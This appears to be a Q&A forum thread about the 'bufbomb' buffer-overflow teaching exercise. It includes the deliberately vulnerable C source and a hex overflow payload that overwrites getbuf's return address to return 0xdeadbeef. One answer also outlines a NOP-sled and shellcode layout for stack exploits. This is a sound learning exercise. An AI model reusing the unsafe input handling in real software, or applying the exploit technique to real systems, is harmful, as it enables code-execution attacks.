# bufbomb stack overflow failed

Tags: c, gcc, buffer-overflow

I'm using `bufbomb.c` to do some `buffer overflow attack` experimenting.

I successfully used `gdb` to debug the code.  Howeverer; when I run the program directly, I get a `"Segmentation fault (core dumped)"` when I enter the characters to try the attack.

I used gcc (Ubuntu/Linaro 4.8.1-10ubuntu9) 4.8.1. to build the following.

```
//bufbomb.c  
/* Bomb program that is solved using a buffer overflow attack */ 

#include <stdio.h>  
#include <stdlib.h>  
#include <ctype.h>  

/* Like gets, except that characters are typed as pairs of hex digits. 
   Nondigit characters are ignored.  Stops when encounters newline */ 
char *getxs(char *dest) 
{ 
    int c; 
    int even =1; /* Have read even number of digits */ 
    int otherd =0; /* Other hex digit of pair */ 
    char*sp = dest; 
    while ((c = getchar()) != EOF && c !='\n') { 
        if (isxdigit(c)) {
            int val; 
            if ('0'<= c && c <='9') 
                val = c -'0'; 
            else if ('A'<= c && c <='F') 
                val = c -'A'+10; 
            else 
                val = c -'a'+10; 
            if (even) { 
                otherd = val; 
                even =0; 
            } 
            else { 
                *sp++= otherd *16+ val; 
                even =1; 
            } 
        } 
    } 
    *sp++='\0'; 
    return dest; 
} 

/* $begin getbuf-c */ 
int getbuf() 
{ 
    char buf[12]; 
    getxs(buf); 
    return 1; 
} 

void test() 
{ 
    int val; 
    printf("Type Hex string:"); 
    val = getbuf(); 
    printf("getbuf returned 0x%x\n", val); 
} 
/* $end getbuf-c */ 

int main() 
{ 
    int buf[16]; 
    /* This little hack is an attempt to get the stack to be in a 
       stable position 
    */ 
    int offset = (((int) buf) &0xFFF); 
    int*space = (int*) alloca(offset); 
    *space =0; /* So that don't get complaint of unused variable */ 
    test(); 
    return 0; 
}
```

Then I executed it under gdb:

```
...> gdb ./bugbomb
...
..run
Type Hex string:30 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 37 38 39 d8 bf ff ff 9f 85 04 08 b0 86 04 08 30 31 32 33 30 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 37 38 39 ef be ad de
getbuf returned 0xdeadbeef
[Inferior 1 (process 13530) exited normally]
```

And then without gdb::

```
./bufbomb 
Type Hex string:30 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 37 38 39 d8 bf ff ff 9f 85 04 08 b0 86 04 08 30 31 32 33 30 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 37 38 39 ef be ad de
Segmentation fault (core dumped)
```

I am looking for some help to resolve the seg-fault.

Comment: I use the following command to compile：gcc -o bufbomb -fno-stack-protector -m32 -g bufbomb.c

Comment: Behaviour of a program under buffer overflow conditions is undefined. It may crash, may not. What exactly are you trying to achieve?

Comment: FYI: I compiled the question code on Linux (SUSE SLES11), using: 'gcc -o bufbomb -fno-stack-protector -m32 -g bufbomb.c'.  Running the code under gdb, or not, produced a segfault.  I agree with @dmitri; and also ask, what is the expected behavior of the program?  Please edit the question and clarify.

Comment: Sorry I did not clearly explain my intentions，The function getbuf() return 1 and function test() will print "getbuf returned 1",and I want     to print "getbuf returned 0xdeadbeef"

Answer (score 1):

Run it under gdb with a bigger buffer to see which address it's trying to access to guess the stack offset of the return address used by `getbuf()`.

To bear with small differences in memory offsets that arise from the use of gdb, use a NOP-sled. Your attack buffer should look like this:

> |RET ADDRESS x 30 | NOPS (`0x90`) x 1000 | SHELLCODE|.

The return address should point to the middle of the NOP-sled.

If the execution jumps anywhere in the sled, it will slide to the shellcode.

Comment: Oh,thanks for your answer.Actually I just started learning about buffer overflow,and I don't know much about shellcode.Could you give me more suggestions or tutorials about shellcode

Answer (score 0):

You are accessing memory that your process doesn't "own".

When you run gdb, the compiler adds stuff (like extra debug info).

You can bypass the segmentation fault by expanding the stack before you attempt the buffer overflow:

```
int expand_stack(int n_bytes) 
{
  char buf[n_bytes];
  return buf[n_bytes-1]; // access the memory to make sure the optimiser doesn't remove buf.
}
```

And in `main`, add a call to `expand_stack` before you call `test`:

```
int main() 
{ 
    int buf[16]; 
    /* This little hack is an attempt to get the stack to be in a 
       stable position 
    */ 
    int offset = (((int) buf) &0xFFF); 
    int*space = (int*) alloca(offset); 
    *space = expand_stack(200); 

    test(); 
    return 0; 
}
```

Note that your code still invokes undefined behaviour.

Note2: If your compiler doesn't support variable length arrays, just use a fixed array, `buf[200]`.

Comment: The point is not to expand the stack frame of the current function, but overwrite the return address stored *after* the frame. Once the return address is overridden, you don't care if you destroyed the stack, since your code is running.

Comment: Are you saying that the stack is already big enough, and that he is overwriting the return adress with crap, causing the return jump to jump into "uncharted territory"?

Comment: Exactly. The point of the exploit is to overwrite the address with something else than just crap, namely with a user-controlled address. If the user chose the right address, the execution jumps to user-controlled code.

Comment: Thanks for your answer.I want to know if the proc running normally the stack frame size is same as proc running in gdb.If same,why I use -fno-stack-protector option to compile but the result is different.I think gcc does't provide any stack protection for the bufbomb.c .Does operation system provide protection?

Comment: Add that,I hope to attempt the buffer overflow without modifying the source file.